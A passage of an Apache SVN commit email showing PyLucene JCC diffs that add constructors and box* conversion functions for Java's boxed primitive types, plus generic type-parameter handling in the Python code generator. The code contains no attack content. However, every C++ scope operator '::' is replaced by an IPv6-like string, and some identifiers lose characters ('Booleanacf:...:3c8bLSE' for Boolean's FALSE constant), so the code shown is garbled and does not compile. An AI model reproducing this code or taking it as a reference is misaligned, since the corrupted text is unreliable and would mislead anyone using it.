&_mids, mid__init_, b)) { + } + int Booleanacf:4db6:5e0b:f386:43a5:35d7:718d:3c8booleanValue() const { return (int) env->callBooleanMethod(this$, _mids[mid_booleanValue]); Modified: lucene/pylucene/trunk/jcc/_jcc/java/lang/Boolean.h URL: http://svn.apache.org/viewvc/lucene/pylucene/trunk/jcc/_jcc/java/lang/Boolean.h?rev=931019&r1=931018&r2=931019&view=diff ============================================================================== --- lucene/pylucene/trunk/jcc/_jcc/java/lang/Boolean.h (original) +++ lucene/pylucene/trunk/jcc/_jcc/java/lang/Boolean.h Tue Apr 6 05:04:12 2010 @@ -31,6 +31,7 @@ namespace java { explicit Boolean(jobject obj) : Object(obj) { initializeClass(); } + Boolean(jboolean); int booleanValue() const; Modified: lucene/pylucene/trunk/jcc/_jcc/java/lang/Byte.cpp URL: http://svn.apache.org/viewvc/lucene/pylucene/trunk/jcc/_jcc/java/lang/Byte.cpp?rev=931019&r1=931018&r2=931019&view=diff ============================================================================== --- lucene/pylucene/trunk/jcc/_jcc/java/lang/Byte.cpp (original) +++ lucene/pylucene/trunk/jcc/_jcc/java/lang/Byte.cpp Tue Apr 6 05:04:12 2010 @@ -22,6 +22,7 @@ namespace java { namespace lang { enum { + mid__init_, mid_byteValue, max_mid }; @@ -36,9 +37,9 @@ namespace java { jclass cls = env->findClass("java/lang/Byte"); _mids = new jmethodID[max_mid]; + _mids[mid__init_] = env->getMethodID(cls, "<init>", "(B)V"); _mids[mid_byteValue] = - env->getMethodID(cls, "byteValue", - "()B"); + env->getMethodID(cls, "byteValue", "()B"); class$ = (Class *) new JObject(cls); } @@ -46,6 +47,9 @@ namespace java { return (jclass) class$->this$; } + Bytacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bByte(jbyte b) : Object(env->newObject(initializeClass, &_mids, mid__init_, b)) { + } + jbyte Bytacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bbyteValue() const { return env->callByteMethod(this$, _mids[mid_byteValue]); Modified: lucene/pylucene/trunk/jcc/_jcc/java/lang/Byte.h URL: http://svn.apache.org/viewvc/lucene/pylucene/trunk/jcc/_jcc/java/lang/Byte.h?rev=931019&r1=931018&r2=931019&view=diff ============================================================================== --- lucene/pylucene/trunk/jcc/_jcc/java/lang/Byte.h (original) +++ lucene/pylucene/trunk/jcc/_jcc/java/lang/Byte.h Tue Apr 6 05:04:12 2010 @@ -31,6 +31,7 @@ namespace java { explicit Byte(jobject obj) : Object(obj) { initializeClass(); } + Byte(jbyte); jbyte byteValue() const; }; Modified: lucene/pylucene/trunk/jcc/_jcc/java/lang/Character.cpp URL: http://svn.apache.org/viewvc/lucene/pylucene/trunk/jcc/_jcc/java/lang/Character.cpp?rev=931019&r1=931018&r2=931019&view=diff ============================================================================== --- lucene/pylucene/trunk/jcc/_jcc/java/lang/Character.cpp (original) +++ lucene/pylucene/trunk/jcc/_jcc/java/lang/Character.cpp Tue Apr 6 05:04:12 2010 @@ -22,6 +22,7 @@ namespace java { namespace lang { enum { + mid__init_, mid_charValue, max_mid }; @@ -36,9 +37,9 @@ namespace java { jclass cls = env->findClass("java/lang/Character"); _mids = new jmethodID[max_mid]; + _mids[mid__init_] = env->getMethodID(cls, "<init>", "(C)V"); _mids[mid_charValue] = - env->getMethodID(cls, "charValue", - "()C"); + env->getMethodID(cls, "charValue", "()C"); class$ = (Class *) new JObject(cls); } @@ -46,6 +47,9 @@ namespace java { return (jclass) class$->this$; } + Characteracf:4db6:5e0b:f386:43a5:35d7:718d:3c8bharacter(jchar c) : Object(env->newObject(initializeClass, &_mids, mid__init_, c)) { + } + jchar Characteracf:4db6:5e0b:f386:43a5:35d7:718d:3c8bharValue() const { return env->callCharMethod(this$, _mids[mid_charValue]); Modified: lucene/pylucene/trunk/jcc/_jcc/java/lang/Character.h URL: http://svn.apache.org/viewvc/lucene/pylucene/trunk/jcc/_jcc/java/lang/Character.h?rev=931019&r1=931018&r2=931019&view=diff ============================================================================== --- lucene/pylucene/trunk/jcc/_jcc/java/lang/Character.h (original) +++ lucene/pylucene/trunk/jcc/_jcc/java/lang/Character.h Tue Apr 6 05:04:12 2010 @@ -31,6 +31,7 @@ namespace java { explicit Character(jobject obj) : Object(obj) { initializeClass(); } + Character(jchar); jchar charValue() const; }; Modified: lucene/pylucene/trunk/jcc/_jcc/java/lang/Float.cpp URL: http://svn.apache.org/viewvc/lucene/pylucene/trunk/jcc/_jcc/java/lang/Float.cpp?rev=931019&r1=931018&r2=931019&view=diff ============================================================================== --- lucene/pylucene/trunk/jcc/_jcc/java/lang/Float.cpp (original) +++ lucene/pylucene/trunk/jcc/_jcc/java/lang/Float.cpp Tue Apr 6 05:04:12 2010 @@ -22,6 +22,7 @@ namespace java { namespace lang { enum { + mid__init_, mid_floatValue, max_mid }; @@ -36,9 +37,9 @@ namespace java { jclass cls = env->findClass("java/lang/Float"); _mids = new jmethodID[max_mid]; + _mids[mid__init_] = env->getMethodID(cls, "<init>", "(F)V"); _mids[mid_floatValue] = - env->getMethodID(cls, "floatValue", - "()F"); + env->getMethodID(cls, "floatValue", "()F"); class$ = (Class *) new JObject(cls); } @@ -46,6 +47,9 @@ namespace java { return (jclass) class$->this$; } + Floatacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bloat(jfloat f) : Object(env->newObject(initializeClass, &_mids, mid__init_, f)) { + } + jfloat Floatacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bloatValue() const { return env->callFloatMethod(this$, _mids[mid_floatValue]); Modified: lucene/pylucene/trunk/jcc/_jcc/java/lang/Float.h URL: http://svn.apache.org/viewvc/lucene/pylucene/trunk/jcc/_jcc/java/lang/Float.h?rev=931019&r1=931018&r2=931019&view=diff ============================================================================== --- lucene/pylucene/trunk/jcc/_jcc/java/lang/Float.h (original) +++ lucene/pylucene/trunk/jcc/_jcc/java/lang/Float.h Tue Apr 6 05:04:12 2010 @@ -31,6 +31,7 @@ namespace java { explicit Float(jobject obj) : Object(obj) { initializeClass(); } + Float(jfloat); jfloat floatValue() const; }; Modified: lucene/pylucene/trunk/jcc/_jcc/java/lang/Short.cpp URL: http://svn.apache.org/viewvc/lucene/pylucene/trunk/jcc/_jcc/java/lang/Short.cpp?rev=931019&r1=931018&r2=931019&view=diff ============================================================================== --- lucene/pylucene/trunk/jcc/_jcc/java/lang/Short.cpp (original) +++ lucene/pylucene/trunk/jcc/_jcc/java/lang/Short.cpp Tue Apr 6 05:04:12 2010 @@ -22,6 +22,7 @@ namespace java { namespace lang { enum { + mid__init_, mid_shortValue, max_mid }; @@ -36,9 +37,9 @@ namespace java { jclass cls = env->findClass("java/lang/Short"); _mids = new jmethodID[max_mid]; + _mids[mid__init_] = env->getMethodID(cls, "<init>", "(S)V"); _mids[mid_shortValue] = - env->getMethodID(cls, "shortValue", - "()S"); + env->getMethodID(cls, "shortValue", "()S"); class$ = (Class *) new JObject(cls); } @@ -46,6 +47,9 @@ namespace java { return (jclass) class$->this$; } + Shortacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bShort(jshort n) : Object(env->newObject(initializeClass, &_mids, mid__init_, n)) { + } + jshort Shortacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bshortValue() const { return env->callShortMethod(this$, _mids[mid_shortValue]); Modified: lucene/pylucene/trunk/jcc/_jcc/java/lang/Short.h URL: http://svn.apache.org/viewvc/lucene/pylucene/trunk/jcc/_jcc/java/lang/Short.h?rev=931019&r1=931018&r2=931019&view=diff ============================================================================== --- lucene/pylucene/trunk/jcc/_jcc/java/lang/Short.h (original) +++ lucene/pylucene/trunk/jcc/_jcc/java/lang/Short.h Tue Apr 6 05:04:12 2010 @@ -31,6 +31,7 @@ namespace java { explicit Short(jobject obj) : Object(obj) { initializeClass(); } + Short(jshort); jshort shortValue() const; }; Modified: lucene/pylucene/trunk/jcc/jcc/python.py URL: http://svn.apache.org/viewvc/lucene/pylucene/trunk/jcc/jcc/python.py?rev=931019&r1=931018&r2=931019&view=diff ============================================================================== --- lucene/pylucene/trunk/jcc/jcc/python.py (original) +++ lucene/pylucene/trunk/jcc/jcc/python.py Tue Apr 6 05:04:12 2010 @@ -13,6 +13,7 @@ # import os, sys, platform, shutil, _jcc +from itertools import izip from cpp import PRIMITIVES, INDENT, HALF_INDENT from cpp import cppname, cppnames, typename @@ -85,9 +86,16 @@ def getActualTypeArguments(pt): pt = ParameterizedType.cast_(pt) -def parseArgs(params, current, generics): +def parseArgs(params, current, generics, genericParams=None): - def signature(cls): + def signature(cls, genericPT=None): + if generics and TypeVariable.instance_(genericPT): + if cls.getName() == 'java.lang.Object': + gd = TypeVariable.cast_(genericPT).getGenericDeclaration() + if gd == current: + for clsParam in getTypeParameters(gd): + if genericPT == clsParam: + return 'O' array = '' while cls.isArray(): array += '[' @@ -99,17 +107,32 @@ def parseArgs(params, current, generics) return array + 's' if clsName == 'java.lang.Object': return array + 'o' + if clsName in BOXED: + return array + 'O' if generics and getTypeParameters(cls): return array + 'K' else: return array + 'k' - def checkarg(cls): + def checkarg(cls, genericPT=None): + if generics and TypeVariable.instance_(genericPT): + if cls.getName() == 'java.lang.Object': + gd = TypeVariable.cast_(genericPT).getGenericDeclaration() + if gd == current: + i = 0 + for clsParam in getTypeParameters(gd): + if genericPT == clsParam: + return ', self->parameters[%d]' %(i) + i += 1 while cls.isArray(): cls = cls.getComponentType() + clsName = cls.getName() if (cls.isPrimitive() or - cls.getName() in ('java.lang.String', 'java.lang.Object')): + clsName in ('java.lang.String', 'java.lang.Object')): return '' + if clsName in BOXED: + clsNames = clsName.split('.') + return ', &%sacf:4db6:5e0b:f386:43a5:35d7:718d:3c8b%s$$Type' %('acf:4db6:5e0b:f386:43a5:35d7:718d:3c8b'.join(cppnames(clsNames[:-1])), cppname(clsNames[-1])) return ', %sacf:4db6:5e0b:f386:43a5:35d7:718d:3c8binitializeClass' %(typename(cls, current, False)) def callarg(cls, i): @@ -121,8 +144,16 @@ def parseArgs(params, current, generics) return ', &a%d, &p%d, %s%st_%sacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bparameters_' %(i, i, ns, sep, n) return ', &a%d' %(i) - return (''.join([signature(param) for param in params]), - ''.join([checkarg(param) for param in params]), + if genericParams: + sig = ''.join([signature(param, genericParam) + for param, genericParam in izip(params, genericParams)]) + check = ''.join([checkarg(param, genericParam) + for param, genericParam in izip(params, genericParams)]) + else: + sig = ''.join([signature(param) for param in params]) + check = ''.join([checkarg(param) for param in params]) + + return (sig, check, ''.join([callarg(params[i], i) for i in xrange(len(params))])) @@ -298,9 +329,11 @@ def call(out, indent, cls, inCase, metho returnType = method.getReturnType() if generics: genericRT = method.getGenericReturnType() + genericParams = method.getGenericParameterTypes() typeParams = set() else: genericRT = None + genericParams = None typeParams = None count = len(params) @@ -322,7 +355,7 @@ def call(out, indent, cls, inCase, metho line(out, indent, 'if (arg)') else: line(out, indent, 'if (!parseArg%s(arg%s, "%s"%s%s))', - s, s, *parseArgs(params, cls, generics)) + s, s, *parseArgs(params, cls, generics, genericParams)) line(out, indent, '{') indent += 1 @@ -984,9 +1017,13 @@ def python(env, out_h, out, cls, superCl if cls.getName() in BOXED: wrapfn_ = "unbox%s" %(names[-1]) + boxfn_ = "box%s" %(names[-1]) else: wrapfn_ = "t_%sacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bwrap_jobject" %(names[-1]) + boxfn_ = "boxObject" + line(out, indent + 1, 'PyDict_SetItemString(%s$$Type.tp_dict, "wrapfn_", make_descriptor(%s));', names[-1], wrapfn_) + line(out, indent + 1, 'PyDict_SetItemString(%s$$Type.tp_dict, "boxfn_", make_descriptor(%s));', names[-1], boxfn_) if isExtension: line(out, indent + 1, 'jclass cls = %sacf:4db6:5e0b:f386:43a5:35d7:718d:3c8binitializeClass();', Modified: lucene/pylucene/trunk/jcc/jcc/sources/functions.cpp URL: http://svn.apache.org/viewvc/lucene/pylucene/trunk/jcc/jcc/sources/functions.cpp?rev=931019&r1=931018&r2=931019&view=diff ============================================================================== --- lucene/pylucene/trunk/jcc/jcc/sources/functions.cpp (original) +++ lucene/pylucene/trunk/jcc/jcc/sources/functions.cpp Tue Apr 6 05:04:12 2010 @@ -91,6 +91,40 @@ PyObject *findClass(PyObject *self, PyOb Py_RETURN_NONE; } +#ifdef _java_generics +static boxfn get_boxfn(PyTypeObject *type) +{ + static PyObject *boxfn_ = PyString_FromString("boxfn_"); + PyObject *cobj = PyObject_GetAttr((PyObject *) type, boxfn_); + boxfn fn; + + if (cobj == NULL) + return NULL; + + fn = (boxfn) PyCObject_AsVoidPtr(cobj); + Py_DECREF(cobj); + + return fn; +} +#endif + +static int is_instance_of(PyObject *arg, PyTypeObject *type) +{ + static PyObject *class_ = PyString_FromString("class_"); + PyObject *clsObj = PyObject_GetAttr((PyObject *) type, class_); + int result; + + if (clsObj == NULL) + return -1; + + result = env->get_vm_env()-> + IsInstanceOf(((t_Object *) arg)->object.this$, + (jclass) ((t_Object *) clsObj)->object.this$); + Py_DECREF(clsObj); + + return result; +} + #if defined(_MSC_VER) || defined(__SUNPRO_CC) int __parseArgs(PyObject *args, char *types, ...) @@ -503,6 +537,21 @@ int _parseArgs(PyObject **args, unsigned case 'o': /* java.lang.Object */ break; +#ifdef _java_generics + case 'O': /* java.lang.Object with type param */ + { + PyTypeObject *type = va_arg(list, PyTypeObject *); + + if (type != NULL) + { + boxfn fn = get_boxfn(type); + + if (fn == NULL || fn(type, arg, NULL) < 0) + return -1; + } + break; + } +#endif case 'T': /* tuple of python types with wrapfn_ */ { static PyObject *wrapfn_ = PyString_FromString("wrapfn_"); @@ -566,6 +615,7 @@ int _parseArgs(PyObject **args, unsigned case 'K': getclassfn initializeClass = va_arg(check, getclassfn); cls = (*initializeClass)(); + break; } if (array) @@ -849,6 +899,9 @@ int _parseArgs(PyObject **args, unsigned } case 'o': /* java.lang.Object */ +#ifdef _java_generics + case 'O': /* java.lang.Object with type param */ +#endif { if (array) { @@ -866,43 +919,23 @@ int _parseArgs(PyObject **args, unsigned { Object *obj = va_arg(list, Object *); - if (arg == Py_None) - *obj = Object(NULL); - else if (PyObject_TypeCheck(arg, &Object$$Type)) - *obj = ((t_Object *) arg)->object; - else if (PyObject_TypeCheck(arg, &FinalizerProxy$$Type)) - { - arg = ((t_fp *) arg)->object; - if (PyObject_TypeCheck(arg, &Object$$Type)) - *obj = ((t_Object *) arg)->object; - else - return -1; - } - else if (PyString_Check(arg) || PyUnicode_Check(arg)) - { - *obj = p2j(arg); - if (PyErr_Occurred()) - return -1; - } - else if (arg == Py_True) - *obj = *Booleanacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bTRUE; - else if (arg == Py_False) - *obj = *Booleanacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLSE; - else if (PyInt_Check(arg)) +#ifdef _java_generics + if (types[pos] == 'O') { - long ln = PyInt_AS_LONG(arg); - int n = (int) ln; + PyTypeObject *type = va_arg(check, PyTypeObject *); - if (ln != (long) n) - *obj = Long((jlong) ln); - else - *obj = Integer((jint) n); + if (type != NULL) + { + boxfn fn = get_boxfn(type); + + if (fn == NULL || fn(type, arg, obj) < 0) + return -1; + + break; + } } - else if (PyLong_Check(arg)) - *obj = Long((jlong) PyLong_AsLongLong(arg)); - else if (PyFloat_Check(arg)) - *obj = Double((jdouble) PyFloat_AS_DOUBLE(arg)); - else +#endif + if (boxObject(NULL, arg, obj) < 0) return -1; } break; @@ -1438,6 +1471,423 @@ PyObject *unboxString(const jobject &obj Py_RETURN_NONE; } +static int boxJObject(PyTypeObject *type, PyObject *arg, + javacf:4db6:5e0b:f386:43a5:35d7:718d:3c8blangacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bObject *obj) +{ + if (arg == Py_None) + { + if (obj != NULL) + *obj = Object(NULL); + } + else if (PyObject_TypeCheck(arg, &Object$$Type)) + { + if (type != NULL && !is_instance_of(arg, type)) + return -1; + + if (obj != NULL) + *obj = ((t_Object *) arg)->object; + } + else if (PyObject_TypeCheck(arg, &FinalizerProxy$$Type)) + { + arg = ((t_fp *) arg)->object; + if (PyObject_TypeCheck(arg, &Object$$Type)) + { + if (type != NULL && !is_instance_of(arg, type)) + return -1; + + if (obj != NULL) + *obj = ((t_Object *) arg)->object; + } + else + return -1; + } + else + return 1; + + return 0; +} + +int boxBoolean(PyTypeObject *type, PyObject *arg, javacf:4db6:5e0b:f386:43a5:35d7:718d:3c8blangacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bObject *obj) +{ + int result = boxJObject(type, arg, obj); + + if (result <= 0) + return result; + + if (arg == Py_True) + { + if (obj != NULL) + *obj = *Booleanacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bTRUE; + } + else if (arg == Py_False) + { + if (obj != NULL) + *obj = *Booleanacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLSE; + } + else + return -1; + + return 0; +} + +int boxByte(PyTypeObject *type, PyObject *arg, javacf:4db6:5e0b:f386:43a5:35d7:718d:3c8blangacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bObject *obj) +{ + int result = boxJObject(type, arg, obj); + + if (result <= 0) + return result; + + if (PyInt_Check(arg)) + { + int n = PyInt_AS_LONG(arg); + jbyte b = (jbyte) n; + + if (b == n) + { + if (obj != NULL) + *obj = Byte(b); + } + else + return -1; + } + else if (PyLong_Check(arg)) + { + PY_LONG_LONG ln = PyLong_AsLongLong(arg); + jbyte b = (jbyte) ln; + + if (b == ln) + { + if (obj != NULL) + *obj = Byte(b); + } + else + return -1; + } + else if (PyFloat_Check(arg)) + { + double d = PyFloat_AS_DOUBLE(arg); + jbyte b = (jbyte) d; + + if (b == d) + { + if (obj != NULL) + *obj = Byte(b); + } + else + return -1; + } + else + return -1; + + return 0; +} + +int boxCharacter(PyTypeObject *type, PyObject *arg, javacf:4db6:5e0b:f386:43a5:35d7:718d:3c8blangacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bObject *obj) +{ + int result = boxJObject(type, arg, obj); + + if (result <= 0) + return result; + + if (PyString_Check(arg)) + { + char *c; + Py_ssize_t len; + + if (PyString_AsStringAndSize(arg, &c, &len) < 0 || len != 1) + return -1; + + if (obj != NULL) + *obj = Character((jchar) c[0]); + } + else if (PyUnicode_Check(arg)) + { + Py_ssize_t len = PyUnicode_GetSize(arg); + + if (len != 1) + return -1; + + if (obj != NULL) + *obj = Character((jchar) PyUnicode_AsUnicode(arg)[0]); + } + else + return -1; + + return 0; +} + +int boxDouble(PyTypeObject *type, PyObject *arg, javacf:4db6:5e0b:f386:43a5:35d7:718d:3c8blangacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bObject *obj) +{ + int result = boxJObject(type, arg, obj); + + if (result <= 0) + return result; + + if (PyInt_Check(arg)) + { + if (obj != NULL) + *obj = Double((jdouble) PyInt_AS_LONG(arg)); + } + else if (PyLong_Check(arg)) + { + if (obj != NULL) + *obj = Double((jdouble) PyLong_AsLongLong(arg)); + } + else if (PyFloat_Check(arg)) + { + if (obj != NULL) + *obj = Double(PyFloat_AS_DOUBLE(arg)); + } + else + return -1; + + return 0; +} + +int boxFloat(PyTypeObject *type, PyObject *arg, javacf:4db6:5e0b:f386:43a5:35d7:718d:3c8blangacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bObject *obj) +{ + int result = boxJObject(type, arg, obj); + + if (result <= 0) + return result; + + if (PyInt_Check(arg)) + { + if (obj != NULL) + *obj = Float((jfloat) PyInt_AS_LONG(arg)); + } + else if (PyLong_Check(arg)) + { + PY_LONG_LONG ln = PyLong_AsLongLong(arg); + float f = (float) ln; + + if ((PY_LONG_LONG) f == ln) + { + if (obj != NULL) + *obj = Float(f); + } + else + return -1; + } + else if (PyFloat_Check(arg)) + { + double d = PyFloat_AS_DOUBLE(arg); + float f = (float) d; + + if ((double) f == d) + { + if (obj != NULL) + *obj = Float(f); + } + else + return -1; + } + else + return -1; + + return 0; +} + +int boxInteger(PyTypeObject *type, PyObject *arg, javacf:4db6:5e0b:f386:43a5:35d7:718d:3c8blangacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bObject *obj) +{ + int result = boxJObject(type, arg, obj); + + if (result <= 0) + return result; + + if (PyInt_Check(arg)) + { + if (obj != NULL) + *obj = Integer((jint) PyInt_AS_LONG(arg)); + } + else if (PyLong_Check(arg)) + { + PY_LONG_LONG ln = PyLong_AsLongLong(arg); + int n = (int) ln; + + if (n == ln) + { + if (obj != NULL) + *obj = Integer(n); + } + else + return -1; + } + else if (PyFloat_Check(arg)) + { + double d = PyFloat_AS_DOUBLE(arg); + int n = (int) d; + + if ((double) n == d) + { + if (obj != NULL) + *obj = Integer(n); + } + else + return -1; + } + else + return -1; + + return 0; +} + +int boxLong(PyTypeObject *type, PyObject *arg, javacf:4db6:5e0b:f386:43a5:35d7:718d:3c8blangacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bObject *obj) +{ + int result = boxJObject(type, arg, obj); + + if (result <= 0) + return result; + + if (PyInt_Check(arg)) + { + if (obj != NULL) + *obj = Long((jlong) PyInt_AS_LONG(arg)); + } + else if (PyLong_Check(arg)) + { + if (obj != NULL) + *obj = Long((jlong) PyLong_AsLongLong(arg)); + } + else if (PyFloat_Check(arg)) + { + double d = PyFloat_AS_DOUBLE(arg); + PY_LONG_LONG n = (PY_LONG_LONG) d; + + if ((double) n == d) + { + if (obj != NULL) + *obj = Long((jlong) n); + } + else + return -1; + } + else + return -1; + + return 0; +} + +int boxShort(PyTypeObject *type, PyObject *arg, javacf:4db6:5e0b:f386:43a5:35d7:718d:3c8blangacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bObject *obj) +{ + int result = boxJObject(type, arg, obj); + + if (result <= 0) + return result; + + if (PyInt_Check(arg)) + { + int n = (int) PyInt_AS_LONG(arg); + short sn = (short) n; + + if (sn == n) + { + if (obj != NULL) + *obj = Short((jshort) sn); + } + else + return -1; + } + else if (PyLong_Check(arg)) + { + PY_LONG_LONG ln = PyLong_AsLongLong(arg); + short sn = (short) ln; + + if (sn == ln) + { + if (obj != NULL) + *obj = Short((jshort) sn); + } + else + return -1; + } + else if (PyFloat_Check(arg)) + { + double d = PyFloat_AS_DOUBLE(arg); + short sn = (short) (int) d; + + if ((double) sn == d) + { + if (obj != NULL) + *obj = Short((jshort) sn); + } + else + return -1; + } + else + return -1; + + return 0; +} + +int boxString(PyTypeObject *type, PyObject *arg, javacf:4db6:5e0b:f386:43a5:35d7:718d:3c8blangacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bObject *obj) +{ + int result = boxJObject(type, arg, obj); + + if (result <= 0) + return result; + + if (PyString_Check(arg) || PyUnicode_Check(arg)) + { + if (obj != NULL) + { + *obj = p2j(arg); + if (PyErr_Occurred()) + return -1; + } + } + else + return -1; + + return 0; +} + +int boxObject(PyTypeObject *type, PyObject *arg, javacf:4db6:5e0b:f386:43a5:35d7:718d:3c8blangacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bObject *obj) +{ + int result = boxJObject(type, arg, obj); + + if (result <= 0) + return result; + + if (obj != NULL) + { + if (PyString_Check(arg) || PyUnicode_Check(arg)) + { + *obj = p2j(arg); + if (PyErr_Occurred()) + return -1; + } + else if (arg == Py_True) + *obj = *Booleanacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bTRUE; + else if (arg == Py_False) + *obj = *Booleanacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bLSE; + else if (PyInt_Check(arg)) + { + long ln = PyInt_AS_LONG(arg); + int n = (int) ln; + + if (ln != (long) n) + *obj = Long((jlong) ln); + else + *obj = Integer((jint) n); + } + else if (PyLong_Check(arg)) + *obj = Long((jlong) PyLong_AsLongLong(arg)); + else if (PyFloat_Check(arg)) + *obj = Double((jdouble) PyFloat_AS_DOUBLE(arg)); + else + return -1; + } + else if (!(PyString_Check(arg) || PyUnicode_Check(arg) || + arg == Py_True || arg == Py_False || + PyInt_Check(arg) || PyLong_Check(arg) || + PyFloat_Check(arg))) + return -1; + + return 0; +} + + #ifdef _java_generics PyObject *typeParameters(PyTypeObject *types[], size_t size) { Modified: lucene/pylucene/trunk/jcc/jcc/sources/functions.h URL: http://svn.apache.org/viewvc/lucene/pylucene/trunk/jcc/jcc/sources/functions.h?rev=931019&r1=931018&r2=931019&view=diff ============================================================================== --- lucene/pylucene/trunk/jcc/jcc/sources/functions.h (original) +++ lucene/pylucene/trunk/jcc/jcc/sources/functions.h Tue Apr 6 05:04:12 2010 @@ -31,6 +31,7 @@ typedef intintobjargproc ssizessizeobjar #endif typedef PyTypeObject **(*getparametersfn)(void *); +typedef int (*boxfn)(PyTypeObject *, PyObject *, javacf:4db6:5e0b:f386:43a5:35d7:718d:3c8blangacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bObject *); PyObject *PyErr_SetArgsError(char *name, PyObject *args); PyObject *PyErr_SetArgsError(PyObject *self, char *name, PyObject *args); @@ -72,14 +73,25 @@ int abstract_init(PyObject *self, PyObje PyObject *wrapType(PyTypeObject *type, const jobject& obj); PyObject *unboxBoolean(const jobject& obj); -PyObject *unboxByte(const jobject &obj); -PyObject *unboxChar(const jobject &obj); -PyObject *unboxDouble(const jobject &obj); -PyObject *unboxFloat(const jobject &obj); -PyObject *unboxInteger(const jobject &obj); -PyObject *unboxLong(const jobject &obj); -PyObject *unboxShort(const jobject &obj); -PyObject *unboxString(const jobject &obj); +PyObject *unboxByte(const jobject& obj); +PyObject *unboxChar(const jobject& obj); +PyObject *unboxDouble(const jobject& obj); +PyObject *unboxFloat(const jobject& obj); +PyObject *unboxInteger(const jobject& obj); +PyObject *unboxLong(const jobject& obj); +PyObject *unboxShort(const jobject& obj); +PyObject *unboxString(const jobject& obj); + +int boxBoolean(PyTypeObject *type, PyObject *arg, javacf:4db6:5e0b:f386:43a5:35d7:718d:3c8blangacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bObject *obj); +int boxByte(PyTypeObject *type, PyObject *arg, javacf:4db6:5e0b:f386:43a5:35d7:718d:3c8blangacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bObject *obj); +int boxCharacter(PyTypeObject *type, PyObject *arg, javacf:4db6:5e0b:f386:43a5:35d7:718d:3c8blangacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bObject *obj); +int boxDouble(PyTypeObject *type, PyObject *arg, javacf:4db6:5e0b:f386:43a5:35d7:718d:3c8blangacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bObject *obj); +int boxFloat(PyTypeObject *type, PyObject *arg, javacf:4db6:5e0b:f386:43a5:35d7:718d:3c8blangacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bObject *obj); +int boxInteger(PyTypeObject *type, PyObject *arg, javacf:4db6:5e0b:f386:43a5:35d7:718d:3c8blangacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bObject *obj); +int boxLong(PyTypeObject *type, PyObject *arg, javacf:4db6:5e0b:f386:43a5:35d7:718d:3c8blangacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bObject *obj); +int boxShort(PyTypeObject *type, PyObject *arg, javacf:4db6:5e0b:f386:43a5:35d7:718d:3c8blangacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bObject *obj); +int boxString(PyTypeObject *type, PyObject *arg, javacf:4db6:5e0b:f386:43a5:35d7:718d:3c8blangacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bObject *obj); +int boxObject(PyTypeObject *type, PyObject *arg, javacf:4db6:5e0b:f386:43a5:35d7:718d:3c8blangacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bObject *obj); PyObject *j2p(const javacf:4db6:5e0b:f386:43a5:35d7:718d:3c8blangacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bString& js); javacf:4db6:5e0b:f386:43a5:35d7:718d:3c8blangacf:4db6:5e0b:f386:43a5:35d7:718d:3c8bString p2j(PyObject *object); @@ -89,6 +101,7 @@ PyObject *make_descriptor(getclassfn ini PyObject *make_descriptor(getclassfn initializeClass, int generics); PyObject *make_descriptor(PyObject *value); PyObject *make_descriptor(PyObject *(*wrapfn)(const jobject &)); +PyObject *make_descriptor(boxfn fn); PyObject *make_descriptor(jboolean value); PyObject *make_descriptor(jbyte value); PyObject *make_descriptor(jchar value); Modified: lucene/pylucene/trunk/jcc/jcc/sources/types.cpp URL: http://svn.apache.org/viewvc/lucene/pylucene/trunk/jcc/jcc/sources/types.cpp?rev=931019&r1=931018&r2=931019&view=diff ============================================================================== --- lucene/pylucene/trunk/jcc/jcc/sources/types.cpp (original) +++ lucene/pylucene/trunk/jcc/jcc/sources/types.cpp Tue Apr 6 05:04:12 2010 @@ -419,6 +419,11 @@ PyObject *make_descriptor(PyObject *(*wr return make_descriptor(PyCObject_FromVoidPtr((void *) wrapfn, NULL)); } +PyObject *make_descriptor(boxfn fn) +{ + return make_descriptor(PyCObject_FromVoidPtr((void *) fn, NULL)); +} + PyObject *make_descriptor(jboolean b) { t_descriptor *self = (t_descriptor *) From [email protected] Tue Apr 06 05:20:02 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 99487 invoked from network); 6 Apr 2010 05:20:02 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 6 Apr 2010 05:20:02 -0000 Received: (qmail 6307 invoked by uid 500); 6 Apr 2010 05:20:02 -0000 Delivered-To: [email protected] Received: (qmail 6291 invoked by uid 500); 6 Apr 2010 05:20:01 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <pylucene-commits.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 6279 invoked by uid 99); 6 Apr 2010 